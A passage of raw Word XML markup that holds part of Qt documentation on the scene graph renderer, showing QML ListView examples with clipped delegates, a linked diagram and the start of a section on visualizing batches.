          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Item C"</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Item D"</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w: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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"lightblue"</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width</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parent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width</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height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25</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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text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modelData</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anchors</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fill</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parent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horizontalAlignment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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AlignHCenter</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verticalAlignment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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AlignVCenter</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</w:t>
      </w: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id</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clippedDelegateList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x</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clippedList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x </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clippedList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width </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20</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y</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20</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width</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70</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height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100</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clip</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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model</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r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Item A"</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Item B"</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Item C"</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Item D"</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w: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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"lightblue"</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width</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parent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width</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height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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>25</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clip</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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text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modelData</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anchors</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fill</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parent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horizontalAlignment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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AlignHCenter</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verticalAlignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AlignVCenter</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815754">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>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For the</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2090" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on the left, we set its</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2091" w:anchor="clip-prop" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>clip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For the</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2092" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on right, we also set each delegate's</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2093" w:anchor="clip-prop" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>clip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to illustrate the effects of clipping on batching.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/visualize-original.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00815754">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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png"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"http://doc.qt.io/qt-5/images/visualize-original.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1046" type="#_x0000_t75" alt="&quot;Original&quot;" style="width:150.9pt;height:108.3pt">
            <v:imagedata r:id="rId2094" r:href="rId2095"/>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Pr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>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815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Original</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00BC0789" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC0789">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00BC0789">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC0789">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The visualized elements do not respect clipping, and rendering order is arbitrary</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BC0789">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00DE5C7D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1745" w:name="visualizing-batches"/>
      <w:bookmarkStart w:id="1746" w:name="_Toc483000908"/>
      <w:bookmarkStart w:id="1747" w:name="_Toc483003899"/>
      <w:bookmarkStart w:id="1748" w:name="_Toc483604252"/>
      <w:bookmarkStart w:id="1749" w:name="_Toc483605472"/>
      <w:bookmarkEnd w:id="1745"/>
      <w:r w:rsidRPr="00DE5C7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Visualizing Batches</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1746"/>
      <w:bookmarkEnd w:id="1747"/>
      <w:bookmarkEnd w:id="1748"/>
      <w:bookmarkEnd w:id="1749"/>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Setting</w:t>
      </w:r>
      <w:r w:rsidR="00BC0789">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
